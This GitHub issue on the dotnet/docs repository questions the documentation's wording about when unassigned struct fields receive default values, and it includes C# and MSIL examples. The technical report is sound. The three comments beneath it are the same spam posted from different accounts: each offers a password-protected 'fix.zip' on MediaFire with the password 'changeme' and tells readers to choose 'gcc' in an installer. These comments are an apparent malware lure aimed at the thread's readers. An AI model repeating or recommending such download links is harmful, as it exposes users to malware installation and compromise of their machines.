### ISSUE TITLE
Struct initialization and default values – definitive assignment place

### ISSUE THREAD

**Issue by bravequickcleverfibreyarn** [dotnet/docs#42331]
### Type of issue

Typo

### Description

From https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/builtin-types/struct#struct-initialization-and-default-values

>  The compiler performs its usual definite assignment analysis. Any fields that are accessed before being assigned, or not definitely assigned when the constructor finishes executing are assigned their default values **before the constructor body executes**.

This phrase is little confusing. Having example 

```csharp
internal struct FieldInitializationTestStruct
{
    public int x;
    public int y = 1;
    public int z;

    public FieldInitializationTestStruct()
    {
        var f = x+2;
        z = x;
    }
}
```

MSIL produced for .ctor body is

```msil
IL_0000: ldarg.0
IL_0001: ldc.i4.0
IL_0002: stfld int32 LangEnvTests.FieldInitializationTestStruct::x // intialized here
IL_0007: ldarg.0
IL_0008: ldc.i4.1
IL_0009: stfld int32 LangEnvTests.FieldInitializationTestStruct::y
IL_000e: ldarg.0
IL_000f: ldarg.0
IL_0010: ldfld int32 LangEnvTests.FieldInitializationTestStruct::x
IL_0015: stfld int32 LangEnvTests.FieldInitializationTestStruct::z
IL_001a: ret
```

so field is initialized before access but in constructor body. 

So, IMHO:
- Having `default` `struct`, all fields are initialized by `default` to `0`-bit pattern via `initobj`.
- Having `new` `struct`, all fields are initialized as part of `ctor` run where field and default initializations and are place to .ctor by compilation.

### Page URL

https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/builtin-types/struct#struct-initialization-and-default-values

### Content source URL

https://github.com/dotnet/docs/blob/main/docs/csharp/language-reference/builtin-types/struct.md

### Document Version Independent Id

0960802e-80c3-cb56-cb8b-ab1f1b20fb4e

### Article author

@BillWagner

### Metadata

* ID: d9220116-e950-04cf-b6d5-70d15a084a22 
* Service: **dotnet-csharp**
* Sub-service: **lang-reference**

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
